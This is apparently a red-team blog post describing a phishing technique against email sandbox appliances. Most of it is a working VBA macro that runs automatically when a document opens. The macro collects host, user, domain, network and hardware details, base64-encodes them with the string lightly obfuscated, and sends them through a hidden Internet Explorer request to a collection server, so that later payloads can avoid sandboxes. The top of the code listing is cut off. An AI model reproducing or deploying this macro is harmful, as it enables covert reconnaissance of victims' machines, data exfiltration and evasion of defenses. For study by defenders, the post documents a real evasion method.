I decided to mix things up a little bit and do a blog post on something a little different than the usual vulnerability research or CTF write-ups. The bulk of our day job is focused on performing long term external assessments on customer networks, so I thought it might be useful to others to do a post on some hurdles we have had to overcome recently in regards to phishing.
In our experience, phishing is probably responsible for somewhere around 80% of initial network access from external sources. Unfortunately this is due to poor user security training and a handful of other debatable reasons. To try and solve the overwhelming problem of click-happy users, IT administrators have begun installing hardware devices that sandbox incoming emails that contain macros to determine if they perform malicious activity. These devices have become quite effective in stopping suspicious emails from even reaching users.
If you talk to anyone that has been working in security for any significant amount of time, they will tell you that offensive and defensive techniques evolve directly as a result of advances in the other. In our scenario, offensive tactics consisted of emailing users with macros. As a result, defensive tools were developed to sandbox these emails to identify malicious activity. The next natural progression is offensive techniques that render sand-boxing useless.
Our team had reasonable success bypassing these devices using various tricks employed by modern malware; https://threatpost.com/malware-evades-detection-with-novel-technique/120787/, http://www.securityweek.com/dyre-banking-trojan-counts-processor-cores-detect-sandboxes. Realizing that this problem was only going to become more prevalent, we decided to take the idea behind the above links one step further.
We chose to exploit the function of these devices to bypass them. Given that they are designed to execute all code passed to them in a sandbox, we decided we would target the sand-boxing hardware specifically. We picked an arbitrary email address in the target domain, constructed a blatant phishing email that the target would likely see often, and attached a macro that performed extensive enumeration of any system that ran the macro. The macro then takes the results of this enumeration and posts it back to an attacker controlled server. Using the results from the enumeration script, we are now able to create a macro that will only run on systems that do not match the fingerprint of the data we received from the email sandbox. This test can be repeated as many times as the red teamer feels is necessary to gain confidence in the results. An example enumeration macro is listed below.
retStr = ""
strComputer = "."
strQuery = "SELECT * FROM Win32_ComputerSystem"
Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2")
Set colItems = objWMIService.ExecQuery(strQuery)
For Each objItem In colItems
retStr = objItem.Manufacturer
retStr = retStr & "|" & objItem.Model
Next
MakeModel = retStr
End Function
Function EnvironVars()
sHostname = Environ("computername") & "|" & Environ("username") & _
"|" & Environ("userdomain") & "|" & Environ("LOGONSERVER")
EnvironVars = sHostname
End Function
Function RecentFiles()
Set wdApp = ActiveDocument.Application
RecentFiles = wdApp.RecentFiles.Count
End Function
Function GetCores()
Dim objWMIService, cores, Proc, strQuery
strQuery = "select * from Win32_PerfFormattedData_PerfOS_Processor"
Set objWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\.rootcimv2")
Set cores = objWMI.ExecQuery(strQuery, , 48)
Set GetCores = cores
End Function
Function GetNetwork()
retStr = ""
strComputer = "."
strQuery = "Select * From Win32_NetworkAdapter Where PhysicalAdapter = True"
Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2")
Set colItems = objWMIService.ExecQuery(strQuery)
Set ipItems = objWMIService.ExecQuery("Select * From Win32_NetworkAdapterConfiguration")
For Each objItem In colItems
strMacAddress = objItem.MACAddress
sysName = objItem.SystemName
For Each ipItem In ipItems
If ipItem.MACAddress = strMacAddress And ipItem.IPEnabled = "True" Then
retStr = retStr & strMacAddress & "|" & ipItem.IPAddress(0) & "|"
Exit For
End If
Next
Next
GetNetwork = retStr
End Function
Private Function Enc(ByVal strData As String) As Byte()
Dim arrData() As Byte
arrData = StrConv(strData, vbFromUnicode)
Set objXML = CreateObject("MSXml2.DOMDocument")
Set objDocElem = objXML.createElement("data")
objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
objDocElem.nodeTypedValue = arrData
Enc = objDocElem.Text
Set objNode = Nothing
Set objXML = Nothing
End Function
Private Function Dec(ByVal strData As String) As Byte()
Set objXML = CreateObject("MSXml2.DOMDocument")
Set objDocElem = objXML.createElement("data")
objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
objDocElem.Text = strData
Dec = objDocElem.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Sub DoStuff(ByVal strData As String)
Dim IE As Object
Dim strBaseURL As String
Dim pre As String
address = "http://127.0.0.1/"
‘strBaseURL = StrConv(Dec(address), 64)
Set IE = CreateObject("InternetExplorer.Application")
IE.Visible = False
IE.navigate address & strData
On Error GoTo ErrorHandler
Do While IE.Busy: DoEvents: Loop
Do While IE.ReadyState <> 4: DoEvents: Loop
Set doc = IE.Document
If Not IsNull(doc.getElementById("overridelink")) Then
Set lnkOverRide = doc.getElementById("overridelink")
If Not lnkOverRide Is Nothing Then
lnkOverRide.Click
Do While IE.Busy: DoEvents: Loop
Do While IE.ReadyState <> 4: DoEvents: Loop
Set doc = IE.Document
End If
Else
Do While IE.Busy: DoEvents: Loop
Do While IE.ReadyState <> 4: DoEvents: Loop
Set doc = IE.Document
End If
Dim testString As String
testString = IE.Document.body.innerText
IE.Stop
IE.Quit
ErrorHandler:
Exit Sub
End Sub
Sub AutoOpen()
Dim retStr As String
Set cores = GetCores
Length = 0
For Each i In cores
Length = Length + 1
Next
retStr = Str(Length – 1)
retStr = retStr & "|" & RecentFiles
retStr = retStr & "|" & EnvironVars
retStr = retStr & "|" & GetNetwork
retStr = retStr & "|" & MakeModel
retStr = Enc(retStr)
DoStuff (retStr)
End Sub[/sourcecode]